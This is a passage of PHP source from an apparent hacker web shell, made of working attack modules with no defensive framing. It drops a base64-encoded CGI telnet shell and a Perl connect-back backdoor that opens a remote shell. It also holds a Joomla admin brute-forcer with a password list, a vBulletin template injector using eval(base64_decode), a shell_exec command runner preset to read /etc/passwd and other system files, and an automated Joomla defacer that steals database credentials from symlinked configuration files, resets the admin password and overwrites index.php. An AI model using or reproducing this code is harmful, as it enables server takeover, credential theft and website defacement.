iBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNl
|
||
|
|
||
|
$file = fopen("izo.cin" ,"w+");
|
||
|
$write = fwrite ($file ,base64_decode($cgishellizocin));
|
||
|
fclose($file);
|
||
|
chmod("izo.cin",0755);
|
||
|
$netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
|
||
|
MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
|
||
|
ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
|
||
|
MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
|
||
|
ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
|
||
|
MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
|
||
|
Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
|
||
|
KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
|
||
|
SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
|
||
|
ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
|
||
|
UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
|
||
|
VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
|
||
|
ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
|
||
|
JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
|
||
|
bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
|
||
|
ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
|
||
|
YXRhY2hlZFxuXG4iOw==';
|
||
|
|
||
|
$file = fopen("dc.pl" ,"w+");
|
||
|
$write = fwrite ($file ,base64_decode($netcatshell));
|
||
|
fclose($file);
|
||
|
chmod("dc.pl",0755);
|
||
|
echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe>
|
||
|
|
||
|
|
||
|
</div>"; }
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'jbrute'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=jbrute" method="post">
|
||
|
|
||
|
<meta name="author" content="RetnOHacK" />
|
||
|
<meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />
|
||
|
<meta name="description" content="RetnOHacK #Procoder'z Team Albanian" />
|
||
|
<center>
|
||
|
</br></br>
|
||
|
<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />
|
||
|
<form method="post" action="" enctype="multipart/form-data">
|
||
|
<table class="tabnet" width="38%" border="0"><center>
|
||
|
<th colspan="2">Joomla Brute Force</th>
|
||
|
<tr><td><p ><font class="d1">User :</font></th>
|
||
|
<input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p>
|
||
|
</td></tr>
|
||
|
<tr><td><font class="">Sites list :</font>
|
||
|
</td><td><font class="" >Pass list :</font></td></tr>
|
||
|
<tr>
|
||
|
<td>
|
||
|
<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
|
||
|
</td><td>
|
||
|
<textarea name="w0rds" style="background:black;" cols="40" rows="13" >
|
||
|
admin
|
||
|
123456
|
||
|
password
|
||
|
102030
|
||
|
123123
|
||
|
12345
|
||
|
123456789
|
||
|
pass
|
||
|
test
|
||
|
admin123
|
||
|
demo
|
||
|
!@#$%^
|
||
|
</textarea>
|
||
|
</td></tr><center><tr><td>
|
||
|
<font >
|
||
|
<input class="inputzbut" type="submit" name="x" value="start" id="d4">
|
||
|
</font></td></tr><br>
|
||
|
tanks for procoder'z team albanian<br></center></table>
|
||
|
</form></center>
|
||
|
<?
|
||
|
@set_time_limit(0);
|
||
|
|
||
|
if($_POST['x']){
|
||
|
|
||
|
echo "<hr>";
|
||
|
|
||
|
$sites = explode("\n",$_POST["sites"]); // Get Sites
|
||
|
$w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt
|
||
|
|
||
|
$Attack = new Joomla_brute_Force(); // Active Class
|
||
|
|
||
|
|
||
|
foreach($w0rds as $pwd){
|
||
|
|
||
|
foreach($sites as $site){
|
||
|
|
||
|
|
||
|
$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
|
||
|
flush();flush();
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
# Class & Function'z
|
||
|
|
||
|
function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
|
||
|
|
||
|
class Joomla_brute_Force{
|
||
|
|
||
|
public function check_it($site,$user,$pass){ // print result
|
||
|
|
||
|
if(eregi('com_config',$this->post($site,$user,$pass))){
|
||
|
|
||
|
echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
|
||
|
$f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f);
|
||
|
flush();
|
||
|
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
|
||
|
|
||
|
}
|
||
|
|
||
|
public function post($site,$user,$pass){ // Post -> user & pass
|
||
|
|
||
|
$token = $this->extract_token($site);
|
||
|
|
||
|
$curl=curl_init();
|
||
|
|
||
|
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
|
||
|
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
|
||
|
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
|
||
|
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
|
||
|
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
|
||
|
curl_setopt($curl,CURLOPT_POST,1);
|
||
|
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
|
||
|
curl_setopt($curl,CURLOPT_TIMEOUT,20);
|
||
|
|
||
|
$exec=curl_exec($curl);
|
||
|
curl_close($curl);
|
||
|
return $exec;
|
||
|
|
||
|
}
|
||
|
|
||
|
public function extract_token($site){ // get token from source for -> function post
|
||
|
|
||
|
$source = $this->get_source($site);
|
||
|
|
||
|
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
|
||
|
|
||
|
return $token[1][0];
|
||
|
|
||
|
}
|
||
|
|
||
|
public function get_source($site){ // get source for -> function extract_token
|
||
|
|
||
|
$curl=curl_init();
|
||
|
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
|
||
|
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
|
||
|
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
|
||
|
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
|
||
|
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
|
||
|
curl_setopt($curl,CURLOPT_TIMEOUT,20);
|
||
|
|
||
|
$exec=curl_exec($curl);
|
||
|
curl_close($curl);
|
||
|
return $exec;
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
}
|
||
|
/////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=vb" method="post">
|
||
|
<br><br><br><div align="center">
|
||
|
<H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
|
||
|
<b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>
|
||
|
</div><br>
|
||
|
<?
|
||
|
if(empty($_POST['index'])){
|
||
|
echo "<center><FORM method=\"POST\">";
|
||
|
echo "<table class=\"tabnet\">
|
||
|
<th colspan=\"2\">Vb Index Changer</th>
|
||
|
<tr><td>host </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"localhost\" value=\"localhost\"></td></tr>
|
||
|
<tr><td>database </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"database\" value=\"forum_vb\"></td></tr>
|
||
|
<tr><td>username </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"username\" value=\"user_vb\"></td></tr>
|
||
|
<tr><td>password </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"password\" value=\"vb\"></td></tr>
|
||
|
</tr>
|
||
|
<th colspan=\"2\">Your Index Code</th></table><table class=\"tabnet\">
|
||
|
<TEXTAREA name=\"index\" rows=\"13\" style=\"background:black\" border=\"1\" cols=\"69\" name=\"code\">your index code</TEXTAREA><br>
|
||
|
<INPUT class=\"inputzbut\" type=\"submit\" value=\"setting\" name=\"send\">
|
||
|
</FORM></table></center>";
|
||
|
}else{
|
||
|
$localhost = $_POST['localhost'];
|
||
|
$database = $_POST['database'];
|
||
|
$username = $_POST['username'];
|
||
|
$password = $_POST['password'];
|
||
|
$index = $_POST['index'];
|
||
|
@mysql_connect($localhost,$username,$password) or die(mysql_error());
|
||
|
@mysql_select_db($database) or die(mysql_error());
|
||
|
$index=str_replace("\'","'",$index);
|
||
|
$set_index = "{\${eval(base64_decode(\'";
|
||
|
$set_index .= base64_encode("echo \"$index\";");
|
||
|
$set_index .= "\'))}}{\${exit()}}</textarea>";
|
||
|
echo("UPDATE template SET template ='".$set_index."' ") ;
|
||
|
$ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
|
||
|
if($ok){
|
||
|
echo "!! update finish !!<br><br>";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=bypass" method="post">
|
||
|
|
||
|
<?php
|
||
|
echo "<center/><br/><b><font color=#00ff00>-=[ Command Bypass Exploit ]=-</font></b><br>
|
||
|
";
|
||
|
print_r('
|
||
|
<pre>
|
||
|
<form method="POST" action="">
|
||
|
<b><font color=#00ff00><b><font color="#00ff00">Command :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
|
||
|
</form>
|
||
|
<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass :=) </font></strong><select name="liz0" size="1" class="inputz">
|
||
|
<option value="cat /etc/passwd">/etc/passwd</option>
|
||
|
<option value="netstat -an | grep -i listen">netstat</option>
|
||
|
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
|
||
|
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
|
||
|
<option value="cat /etc/hosts">/etc/hosts</option>
|
||
|
<option value="cat /etc/named.conf">/etc/named.conf</option>
|
||
|
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
|
||
|
</select> <input type="submit" class="inputzbut" value="Gö">
|
||
|
</form>
|
||
|
</pre>
|
||
|
');
|
||
|
ini_restore("safe_mode");
|
||
|
ini_restore("open_basedir");
|
||
|
$liz0=shell_exec($_POST[baba]);
|
||
|
$liz0zim=shell_exec($_POST[liz0]);
|
||
|
$uid=shell_exec('id');
|
||
|
$server=shell_exec('uname -a');
|
||
|
echo "<pre><h4>";
|
||
|
|
||
|
echo $liz0;
|
||
|
echo $liz0zim;
|
||
|
echo "</h4></pre>";
|
||
|
"</div>"; }
|
||
|
|
||
|
///////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'jodexer'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=jodexer" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
function randomt() {
|
||
|
|
||
|
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
|
||
|
srand((double)microtime()*1000000);
|
||
|
$i = 0;
|
||
|
$pass = '' ;
|
||
|
|
||
|
while ($i <= 7) {
|
||
|
$num = rand() % 33;
|
||
|
$tmp = substr($chars, $num, 1);
|
||
|
$pass = $pass . $tmp;
|
||
|
$i++;
|
||
|
}
|
||
|
|
||
|
return $pass;
|
||
|
|
||
|
}
|
||
|
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
|
||
|
{
|
||
|
$ar0=explode($marqueurDebutLien, $text);
|
||
|
$ar1=explode($marqueurFinLien, $ar0[$i]);
|
||
|
$ar=trim($ar1[0]);
|
||
|
return $ar;
|
||
|
}
|
||
|
if ($_POST['form_action'])
|
||
|
{
|
||
|
|
||
|
$text=file_get_contents($_POST['file']);
|
||
|
$username=entre2v2($text,"public $user = '","';");
|
||
|
$password=entre2v2($text,"public $password = ', '","';");
|
||
|
$dbname=entre2v2($text,"public $db = ', '","';");
|
||
|
$dbprefix=entre2v2($text,"public $dbprefix = '","';");
|
||
|
$site_url=($_POST['site_url']);
|
||
|
|
||
|
$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
|
||
|
|
||
|
$co=randomt();
|
||
|
/*
|
||
|
echo($username);
|
||
|
echo("<br>");
|
||
|
echo($password);
|
||
|
echo("<br>");
|
||
|
echo($dbname);
|
||
|
echo("<br>");
|
||
|
echo($dbprefix);
|
||
|
echo("<br>");
|
||
|
*/
|
||
|
$co=randomt();
|
||
|
|
||
|
if ($_POST['form_action'])
|
||
|
{
|
||
|
$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
$link=mysql_connect("dzoed.druknet.bt",$username,$password) ;
|
||
|
|
||
|
mysql_select_db($dbname,$link) ;
|
||
|
|
||
|
$tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
|
||
|
echo("<br>[+] Changing admin password to 123456789");
|
||
|
|
||
|
$req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
|
||
|
|
||
|
if ( $req )
|
||
|
{
|
||
|
#################################################################
|
||
|
###################### V1.6 ######################
|
||
|
#################################################################
|
||
|
|
||
|
|
||
|
$req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
|
||
|
$data = mysql_fetch_array($req);
|
||
|
$template_name=$data["template"];
|
||
|
|
||
|
$req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
|
||
|
$data = mysql_fetch_array($req);
|
||
|
$template_id=$data["extension_id"];
|
||
|
|
||
|
$url2=$site_url."/index.php";
|
||
|
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 1);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
|
||
|
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
|
||
|
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
|
||
|
|
||
|
///////////////////////////
|
||
|
$url2=$site_url."/index.php";
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_POST, 1);
|
||
|
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$pos = strpos($buffer,"com_config");
|
||
|
if($pos === false) {
|
||
|
echo("<br>[-] Login Error");
|
||
|
exit;
|
||
|
}
|
||
|
else {
|
||
|
echo("<br>[~] Login Successful");
|
||
|
}
|
||
|
///////////////////////////
|
||
|
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
|
||
|
if($hidden2) {
|
||
|
echo("<br>[+] index.php file founded in Theme Editor");
|
||
|
}
|
||
|
else {
|
||
|
echo("<br>[-] index.php Not found in Theme Editor");
|
||
|
exit;
|
||
|
}
|
||
|
echo("<br>[*] Updating Index.php .....");
|
||
|
$url2=$site_url."/index.php?option=com_templates&layout=edit";
|
||
|
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_POST, 1);
|
||
|
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
|
||
|
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$pos = strpos($buffer,'<dd class="message message">');
|
||
|
if($pos === false) {
|
||
|
echo("<br>[-] Updating Index.php Error");
|
||
|
exit;
|
||
|
}
|
||
|
else {
|
||
|
echo("<br>[~] index.php successfully saved");
|
||
|
}
|
||
|
#################################################################
|
||
|
###################### V1.6 END ######################
|
||
|
#################################################################
|
||
|
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
|
||
|
#################################################################
|
||
|
###################### V1.5 ######################
|
||
|
#################################################################
|
||
|
|
||
|
$req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
|
||
|
$data = mysql_fetch_array($req);
|
||
|
$template_name=$data["template"];
|
||
|
|
||
|
$url2=$site_url."/index.php";
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 1);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
|
||
|
|
||
|
$url2=$site_url."/index.php";
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_POST, 1);
|
||
|
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$pos = strpos($buffer,"com_config");
|
||
|
|
||
|
if($pos === false) {
|
||
|
echo("<br>[-] Login Error");
|
||
|
exit;
|
||
|
}
|
||
|
else {
|
||
|
echo("<br>[+] Login Successful");
|
||
|
}
|
||
|
///////////////////////////
|
||
|
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
|
||
|
|
||
|
if($hidden2) {
|
||
|
echo("<br>[~] index.php file founded in Theme Editor");
|
||
|
}
|
||
|
else {
|
||
|
echo("<br>[-] index.php Not found in Theme Editor");
|
||
|
}
|
||
|
|
||
|
echo("<br>[*] Updating Index.php .....");
|
||
|
$url2=$site_url."/index.php?option=com_templates&layout=edit";
|
||
|
$ch = curl_init();
|
||
|
curl_setopt($ch, CURLOPT_URL, $url2);
|
||
|
curl_setopt($ch, CURLOPT_POST, 1);
|
||
|
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
|
||
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|
||
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
||
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
||
|
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
|
||
|
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
|
||
|
$buffer = curl_exec($ch);
|
||
|
|
||
|
$pos = strpos($buffer,'<dd class="message message fade">');
|
||
|
if($pos === false) {
|
||
|
echo("<br>[-] Updating Index.php Error");
|
||
|
exit;
|
||
|
}
|
||
|
else {
|
||
|
echo("<br>[~] index.php successfully saved");
|
||
|
}
|
||
|
#################################################################
|
||
|
###################### V1.5 END ######################
|
||
|
#################################################################
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
function randomt() {
|
||
|
|
||
|
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
|
||
|
srand((double)microtime()*1000000);
|
||
|
$i = 0;
|
||
|
$pass = '' ;
|
||
|
|
||
|
while ($i <= 7) {
|
||
|
$num = rand() % 33;
|
||
|
$tmp = substr($chars, $num, 1);
|
||
|
$pass = $pass . $tmp;
|
||
|
$i++;
|
||
|
}
|
||
|
|
||
|
return $pass;
|
||
|
|
||
|
}
|
||
|
|
||
|
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
|
||
|
|
||
|
{
|
||
|
|
||
|
$ar0=explode($marqueurDebutLien, $text);
|
||
|
$ar1=explode($marqueurFinLien, $ar0[$i]);
|
||
|
$ar=trim($ar1[0]);
|
||
|
return $ar;
|
||
|
}
|
||
|
|
||
|
}?>
|
||
|
<center><br><br>
|
||
|
<font color="#00ff00" size='+3'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>
|
||
|
</center>
|
||
|
<center><b>
|
||
|
Link of symlink configuration.php of Joomla<br></b>
|
||
|
<FORM action="" method="post">
|
||
|
<input type="hidden" name="form_action" value="1">
|
||
|
<input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">
|
||
|
<br>
|
||
|
<br><b>
|
||
|
Admin Control panel url</b><br>
|
||
|
<input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>
|
||
|
<br><b>
|
||
|
Your Index Code</b>
|
||
|
<br>
|
||
|
<TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code
|
||
|
</TEXTAREA>
|
||
|
<br>
|
||
|
<INPUT class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">
|
||
|
</FORM>
|
||
|
</center>
|
||
|
<script language=JavaScript>m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>
|
||
|
<?php
|
||
|
}
|
||
|
///////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi2012')) {
|
||
|
echo "<center/><br/><b>
|
||
|
+--==[ CGI-Telnet Version 1.3 ]==--+
|
||
|
</b><br><br>";
|
||
|
|
||
|
|
||
|
mkdir('cgi2012', 0755);
|
||
|
chdir('cgi2012');
|
||
|
$kokdosya = ".htaccess";
|
||
|
$dosya_adi = "$kokdosya";
|
||
|
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
|
||
|
$metin = "AddHandler cgi-script .izo";
|
||
|
fwrite ( $dosya , $metin ) ;
|
||
|
fclose ($dosya);
|
||
|
